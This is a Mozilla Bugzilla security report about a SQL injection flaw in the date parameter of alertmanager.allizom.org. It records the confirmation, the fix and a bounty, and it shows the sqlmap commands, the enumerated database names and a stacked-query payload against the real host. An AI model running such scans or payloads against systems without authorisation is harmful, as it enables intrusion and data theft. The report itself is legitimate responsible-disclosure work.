Closed
Bug 1293111
Opened 8 years ago
Closed 8 years ago
SQL injection vulnerability on alertmanager.allizom.org
Categories
(Websites :: Other, defect)
Websites
Other
Tracking
(Not tracked)
RESOLVED
FIXED
People
(Reporter: griffin.francis.1993, Unassigned)
Details
(Keywords: reporter-external, sec-high, wsec-sqli)
User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 Steps to reproduce: Hello, The URL alertmanager.allizom.org/data/setadetails/?date= is vulnerable to SQLI via the date parameter. To validate this I issued the following command to SQLMAP: C:\Users\Griffin\Desktop\sqlmap>sqlmap.py -u "alertmanager.allizom.org/data/seta/details/?date=" --random-agent --tamper=space2comment --schema --threads=10 The following schema was returned (I did not proceed from here) web server operating system: Linux Ubuntu web application technology: Apache 2.4.7 back-end DBMS: MySQL 5.0.11 [16:17:29] [INFO] enumerating database management system schema [16:17:29] [INFO] fetching database names [16:17:29] [INFO] fetching number of databases [16:17:29] [INFO] resumed: 8 [16:17:29] [INFO] resumed: information_schema [16:17:29] [INFO] resumed: alertbot [16:17:29] [INFO] resumed: alerts [16:17:29] [INFO] resumed: mysql [16:17:29] [INFO] resumed: ouija [16:17:29] [INFO] resumed: ouijatest [16:17:29] [INFO] resumed: performance_schema [16:17:29] [INFO] resumed: test Actual results: The date parameter does not properly sanitize against malicious input. Expected results: The above information should not have been returned back within the SQLMAP response.
Updated•8 years ago
|
Comment 1•8 years ago
|
||
Griffin: thanks, the above seems pretty self-describing. I'll do some testing and see how bad it is.
Status: UNCONFIRMED → NEW
Ever confirmed: true
Comment 2•8 years ago
|
||
Griffin: I tried briefly to confirm your observations using the latest sqlmap (1.0.8.15#dev) with the above parameters. It didn't return the same results as you have above. Would you mind sharing exactly what version of sqlmap you're using and whether the above parameters where the exact parameters used to enumerate the DB list?
Flags: needinfo?(griffin.francis.1993)
Comment 3•8 years ago
|
||
Here are my results output from a slightly more tuned scan, just for transparency... $ python ./sqlmap.py -u "alertmanager.allizom.org/data/seta/details/?date=1" --random-agent --tamper=space2comment --schema --threads=10 --dbms mysql _ ___ ___| |_____ ___ ___ {1.0.8.15#dev} |_ -| . | | | .'| . | |___|_ |_|_|_|_|__,| _| |_| |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 20:38:32 [20:38:32] [INFO] loading tamper script 'space2comment' [20:38:32] [INFO] fetched random HTTP User-Agent header from file '/Users/jclaudius/code/sqlmap-dev/txt/user-agents.txt': 'Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.458.0 Safari/534.3' [20:38:32] [INFO] testing connection to the target URL [20:38:32] [INFO] testing if the target URL is stable [20:38:33] [INFO] target URL is stable [20:38:33] [INFO] testing if GET parameter 'date' is dynamic [20:38:33] [WARNING] GET parameter 'date' does not appear dynamic [20:38:33] [WARNING] heuristic (basic) test shows that GET parameter 'date' might not be injectable [20:38:33] [INFO] testing for SQL injection on GET parameter 'date' [20:38:33] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [20:38:35] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' [20:38:35] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' [20:38:36] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)' [20:38:36] [INFO] testing 'MySQL inline queries' [20:38:36] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)' [20:38:36] [WARNING] time-based comparison requires larger statistical model, please wait.... (done) [20:38:37] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind' [20:38:37] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [20:38:45] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [20:38:52] [WARNING] GET parameter 'date' is not injectable [20:38:52] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') [*] shutting down at 20:38:52
Comment 4•8 years ago
|
||
Project Wiki Page: https://wiki.mozilla.org/Auto-tools/Projects/AlertManager Source Repo: https://github.com/jmaher/alert_manager
Comment 5•8 years ago
|
||
Looks like there may have been a typo above. Corrected URL. http://alertmanager.allizom.org/data/setadetails/?date=
Comment 6•8 years ago
|
||
Ok, using the newly corrected URL, I was able to confirm this SQLi vulnerability. ...SNIP... sqlmap identified the following injection point(s) with a total of 73 HTTP(s) requests: --- Parameter: date (GET) Type: stacked queries Title: MySQL > 5.0.11 stacked queries (comment) Payload: date=';SELECT SLEEP(5)# --- [21:11:30] [WARNING] changes made by tampering scripts are not included in shown payload content(s) [21:11:30] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Apache 2.4.7 back-end DBMS: MySQL > 5.0.11 ...SNIP...
Updated•8 years ago
|
Flags: needinfo?(griffin.francis.1993)
Comment 7•8 years ago
|
||
jmaher: I see you're one the more prominent developers of alertmanager. Could you please take a look at this first thing tomorrow and see if we can get a code fix.
Flags: needinfo?(jmaher)
Reporter | ||
Comment 8•8 years ago
|
||
Thanks for the confirmation Jonathan. Much appreciated.
Updated•8 years ago
|
Summary: SQLI on alertmanager.allizom.org → SQL injection vulnerability on alertmanager.allizom.org
Updated•8 years ago
|
Flags: sec-bounty?
Comment 9•8 years ago
|
||
updated: https://github.com/mozilla/ouija/commit/8ab444e1c80e603758759c1c71417b0a53ede131 this is on the live server, thanks for pointing this out.
Flags: needinfo?(jmaher)
Comment 10•8 years ago
|
||
I also worked with jmaher on this and did a second pass with sqlmap. Overall result is that it seems fixed. Here's the results of my sqlmap verification: $ python ./sqlmap.py -u "alertmanager.allizom.org/data/setadetails/?date=1" --random-agent --tamper=space2comment --schema --threads=10 --dbms mysql _ ___ ___| |_____ ___ ___ {1.0.8.15#dev} |_ -| . | | | .'| . | |___|_ |_|_|_|_|__,| _| |_| |_| http://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting at 12:36:25 [12:36:25] [INFO] loading tamper script 'space2comment' [12:36:25] [INFO] fetched random HTTP User-Agent header from file '/Users/jclaudius/code/sqlmap-dev/txt/user-agents.txt': 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2a1pre) Gecko/20090428 Firefox/3.6a1pre' [12:36:25] [INFO] testing connection to the target URL [12:36:26] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS [12:36:26] [INFO] testing if the target URL is stable [12:36:27] [INFO] target URL is stable [12:36:27] [INFO] testing if GET parameter 'date' is dynamic [12:36:27] [WARNING] GET parameter 'date' does not appear dynamic [12:36:27] [WARNING] heuristic (basic) test shows that GET parameter 'date' might not be injectable [12:38:08] [INFO] testing for SQL injection on GET parameter 'date' [12:38:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [12:38:12] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' [12:38:13] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' [12:38:15] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)' [12:38:15] [INFO] testing 'MySQL inline queries' [12:38:15] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)' [12:38:15] [WARNING] time-based comparison requires larger statistical model, please wait.... (done) [12:38:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind' [12:38:20] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [12:38:43] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [12:39:06] [WARNING] GET parameter 'date' is not injectable [12:39:06] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') [*] shutting down at 12:39:06
Updated•8 years ago
|
Status: NEW → RESOLVED
Closed: 8 years ago
Resolution: --- → FIXED
Comment 11•8 years ago
|
||
jmaher: many thanks on the quick turn around for this!
Comment 12•8 years ago
|
||
Griffin: we discussed with the bounty team just now, even though this site isn't enrolled in the bounty program and a compromise of the service wouldn't be critical based on what it's holding and where it lives, we believe the severity of the bug is sufficient to imply RCE or service compromise impact and thus we're going to reward a bounty in this case.
Flags: sec-bounty? → sec-bounty+
Reporter | ||
Comment 13•8 years ago
|
||
Thanks for the turn around on this report. It is much appreciated.
Updated•1 month ago
|
Keywords: reporter-external
You need to log in
before you can comment on or make changes to this bug.
Description
•